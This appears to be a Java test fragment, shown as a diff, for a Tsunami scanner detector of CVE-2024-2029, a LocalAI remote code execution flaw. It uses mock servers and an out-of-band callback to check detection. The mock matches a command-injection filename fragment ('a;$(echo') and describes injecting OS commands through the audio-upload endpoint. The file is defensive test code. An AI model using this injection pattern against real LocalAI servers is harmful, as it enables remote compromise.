FakeUtcClock.create().setNow(Instant.parse("2024-12-03T00:00:00.00Z")); + + private final MockWebServer mockTargetService = new MockWebServer(); + private final MockWebServer mockCallbackServer = new MockWebServer(); + + @Inject private LocalAiCve20242029RceDetector detector; + + TargetInfo targetInfo; + NetworkService targetNetworkService; + private final SecureRandom testSecureRandom = + new SecureRandom() { + @Override + public void nextBytes(byte[] bytes) { + Arrays.fill(bytes, (byte) 0xFF); + } + }; + + @Bind(lazy = true) + @OobSleepDuration + private int sleepDuration = 1; + + private void createInjector() { + Guice.createInjector( + new FakeUtcClockModule(fakeUtcClock), + new HttpClientModule.Builder().build(), + FakePayloadGeneratorModule.builder() + .setCallbackServer(mockCallbackServer) + .setSecureRng(testSecureRandom) + .build(), + Modules.override(new LocalAiCve20242029RceDetectorBootstrapModule()) + .with(BoundFieldModule.of(this))) + .injectMembers(this); + } + + @Before + public void setUp() throws IOException { + mockCallbackServer.start(); + } + + @After + public void tearDown() throws Exception { + mockTargetService.shutdown(); + mockCallbackServer.shutdown(); + } + + @Test + public void detect_whenVulnerable_returnsVulnerability_Cve202229165_Oob() throws IOException { + startMockWebServerForTestingWithOob(true); + createInjector(); + mockCallbackServer.enqueue(PayloadTestHelper.generateMockSuccessfulCallbackResponse()); + + DetectionReportList detectionReports = + detector.detect(targetInfo, ImmutableList.of(targetNetworkService)); + + assertThat(detectionReports.getDetectionReportsList()) + .containsExactly( + DetectionReport.newBuilder() + .setTargetInfo(targetInfo) + .setNetworkService(targetNetworkService) + .setDetectionTimestamp( + Timestamps.fromMillis(Instant.now(fakeUtcClock).toEpochMilli())) + .setDetectionStatus(DetectionStatus.VULNERABILITY_VERIFIED) + .setVulnerability( + Vulnerability.newBuilder() + .setMainId( + VulnerabilityId.newBuilder() + .setPublisher("TSUNAMI_COMMUNITY") + .setValue("CVE_2024_2029")) + .setSeverity(Severity.CRITICAL) + .setTitle("CVE-2024-2029 LocalAI Remote Code Execution") + .setRecommendation( + "LocalAI user should upgrade the LocalAI to the versions v2.10.0 and" + + " above.") + .setDescription( + "Publicly exposed LocalAI instances before v2.7.0 are vulnerable to" + + " Remote Code Execution Vulnerability. Attackers can inject" + + " arbitrary OS commands within the audio filename filed during" + + " uploading the audio file with a POST HTTP request and send it" + + " to the v1/audio/transcriptions endpoint.")) + .build()); + Truth.assertThat(mockTargetService.getRequestCount()).isEqualTo(3); + Truth.assertThat(mockCallbackServer.getRequestCount()).isEqualTo(1); + } + + @Test + public void detect_ifNotVulnerable_doesNotReportVuln_Exposed_Ui() throws IOException { + startMockWebServerForTestingWithOob(false); + createInjector(); + mockCallbackServer.enqueue(PayloadTestHelper.generateMockUnsuccessfulCallbackResponse()); + mockCallbackServer.enqueue(PayloadTestHelper.generateMockUnsuccessfulCallbackResponse()); + DetectionReportList detectionReports = + detector.detect(targetInfo, ImmutableList.of(targetNetworkService)); + assertThat(detectionReports.getDetectionReportsList()).isEmpty(); + Truth.assertThat(mockTargetService.getRequestCount()).isEqualTo(3); + } + + private void startMockWebServerForTestingWithOob(boolean mustHaveForgedCookie) + throws IOException { + final Dispatcher dispatcher = + new Dispatcher() { + @Override + public MockResponse dispatch(RecordedRequest request) { + if (Objects.equals(request.getPath(), "/models") && request.getMethod().equals("GET")) { + return new MockResponse() + .setBody( + "{\"object\":\"list\",\"data\":[{\"id\":\"whisper-1\",\"object\":\"model\"},{\"id\":\"whisper\",\"object\":\"model\"}]}\n") + .setResponseCode(200); + } + if (Objects.equals(request.getPath(), "/v1/audio/transcriptions") + && request.getMethod().equals("POST") + && request + .getBody() + .readString(StandardCharsets.UTF_8) + .contains( + "Content-Disposition: form-data; name=\"file\";" + + " filename=\"a;$(echo")) { + return new MockResponse().setResponseCode(200); + } + return new MockResponse().setBody("[{}]").setResponseCode(200); + } + }; + mockTargetService.setDispatcher(dispatcher); + mockTargetService.start(); + mockTargetService.url("/"); + + targetNetworkService = + NetworkService.newBuilder() + .setNetworkEndpoint( + forHostnameAndPort(mockTargetService.getHostName(), mockTargetService.getPort())) + .addSupportedHttpMethods("POST") + .build(); + targetInfo = + TargetInfo.newBuilder() + .addNetworkEndpoints(targetNetworkService.getNetworkEndpoint()) + .build(); + } +}